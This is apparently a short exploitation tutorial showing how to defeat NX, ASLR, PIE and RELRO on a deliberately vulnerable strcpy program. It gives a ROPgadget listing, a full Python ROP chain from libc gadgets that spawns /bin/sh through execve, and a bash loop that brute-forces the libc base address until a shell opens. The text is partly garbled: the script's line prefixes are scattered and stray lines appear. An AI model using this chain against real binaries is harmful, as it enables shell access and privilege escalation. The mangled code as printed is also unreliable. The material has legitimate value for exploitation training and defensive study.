Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO Simple binary vuln: [jonathan@Archlinux rop-bf]$ cat

main.c #include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char **argv) { char buff[32]; strcpy(buff, argv[1]); return (0); } Compiled with "gcc -o main main.c -pie" PIE ASLR NX RELRO Enable Enable Enable Full

Search gadget with ROPgadget [jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g Gadgets information ============================================================ 0x000003e6: pop %edi | ret 0x00000405: add $0x08,%esp |pop %ebx | ret 0x00000408: pop %ebx | ret 0x00000492: mov (%esp),%ebx | ret 0x0000051c: pop %ebx | pop %esi | pop %ebp | ret 0x0000051e: pop %ebp | ret 0x0000054f: call *%eax 0x00000551: add $0x14,%esp |pop %ebx | pop %ebp | ret 0x00000554: pop %ebx | pop %ebp | ret 0x00000595: mov $0x81ffffff,%esi |ret 0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret Unique gadgets found: 11 Fuck just 11 gadgets found. :/ So, we search gadget in /lib/libc.so.6 and we bruteforce the base address Exploit: [jonathan@Archlinux rop-bf]$ cat exploit.py #!/usr/bin/python2 from struct import pack

base_addr = 0xb770a000 p # p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p p = "a" * 44 execve /bin/sh generated by RopGadget v3.3 += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00178020) # @ .data += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00025baf) # pop %eax | ret += "/bin" += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4 += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00025baf) # pop %eax | ret += "//sh" += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8 += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | += pack("<I", 0x42424242) # padding += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00178020) # @ .data += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | += pack("<I", 0x42424242) # padding += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8 += pack("<I", base_addr + 0x00178020) # @data += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8 += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x00026632) # inc %eax | ret += pack("<I", base_addr + 0x0002dc45) # int $0x80

pop %ebx | ret

pop %ebx | ret

pop %ebx | ret

pop %ebx | ret

pop %ebx | ret

print p

Ok let's go bruteforce: [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault

Segmentation [...] Segmentation Segmentation Segmentation Segmentation Segmentation Segmentation Segmentation sh-4.2$

fault fault fault fault fault fault fault fault

New feature in future ropgadget: ROPmaker for bruteforce Libc - http://shell-storm.org/project/ROPgadget/ @jonathansalwan